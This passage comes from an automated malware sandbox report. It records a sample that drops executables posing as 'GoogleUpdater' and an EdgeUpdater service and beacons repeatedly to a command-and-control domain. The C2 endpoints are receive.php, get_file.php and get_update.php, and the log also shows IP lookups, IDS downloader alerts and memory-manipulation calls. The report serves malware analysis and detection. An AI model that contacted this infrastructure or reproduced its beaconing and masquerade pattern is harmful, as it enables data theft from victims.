Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52934 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52966 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52928 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 172.67.74.152:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52925 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52964 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52958 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52953 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52937 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52960 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52932 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52972 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52955 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52942 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52967 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52918 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52923 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52939 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52948 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52950 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52926 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52974 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52944 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52969 -> 104.26.12.205:80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: yalubluseks.eu
Source: global trafficDNS traffic detected: DNS query: 57.122.6.0.in-addr.arpa
Source: unknownHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://api.ipify.org
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgD
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: LKMService.exe, 00000002.00000002.4677000904.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: http://ocsp.sectigo.com0
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eu
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eud
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: https://pidgin.im0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: https://sectigo.com/CPS0
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.drString found in binary or memory: https://yalubluseks.eu/
Source: LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_filT
Source: LKMService.exe, 00000002.00000002.4661088450.000000000246A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_file.php
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_updatX
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_update.php
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_update.phpT
Source: LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/receiPt
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.000000000246A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/receive.php
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/t
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.euD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52954
Source: unknownNetwork traffic detected: HTTP traffic on port 52949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52959
Source: unknownNetwork traffic detected: HTTP traffic on port 52970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52952
Source: unknownNetwork traffic detected: HTTP traffic on port 52959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52951
Source: unknownNetwork traffic detected: HTTP traffic on port 52935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52919
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 52975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52927
Source: unknownNetwork traffic detected: HTTP traffic on port 52954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52920
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52961
Source: unknownNetwork traffic detected: HTTP traffic on port 52979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52962
Source: unknownNetwork traffic detected: HTTP traffic on port 52938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52929
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52979
Source: unknownNetwork traffic detected: HTTP traffic on port 52976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52933
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52938
Source: unknownNetwork traffic detected: HTTP traffic on port 52930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52936
Source: unknownNetwork traffic detected: HTTP traffic on port 52920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52970
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52971
Source: unknownNetwork traffic detected: HTTP traffic on port 52957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52930
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52973
Source: unknownNetwork traffic detected: HTTP traffic on port 52962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52943
Source: unknownNetwork traffic detected: HTTP traffic on port 52973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52949
Source: unknownNetwork traffic detected: HTTP traffic on port 52929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52981
Source: unknownNetwork traffic detected: HTTP traffic on port 52921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52980
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52940
Source: unknownNetwork traffic detected: HTTP traffic on port 52936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 443
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52933 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52954 version: TLS 1.2

System Summary

barindex
Source: file.exeStatic PE information: section name: ."Rv
Source: LKMService.exe.0.drStatic PE information: section name: ."Rv
Source: GoogleUpdater.exe.2.drStatic PE information: section name: ."Rv
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF5D50 NtProtectVirtualMemory,0_2_04DF5D50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF6230 NtAllocateVirtualMemory,0_2_04DF6230
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF61F8 NtAllocateVirtualMemory,0_2_04DF61F8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04DF5D49 NtProtectVirtualMemory,0_2_04DF5D49
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_049B5D50 NtProtectVirtualMemory,2_2_049B5D50
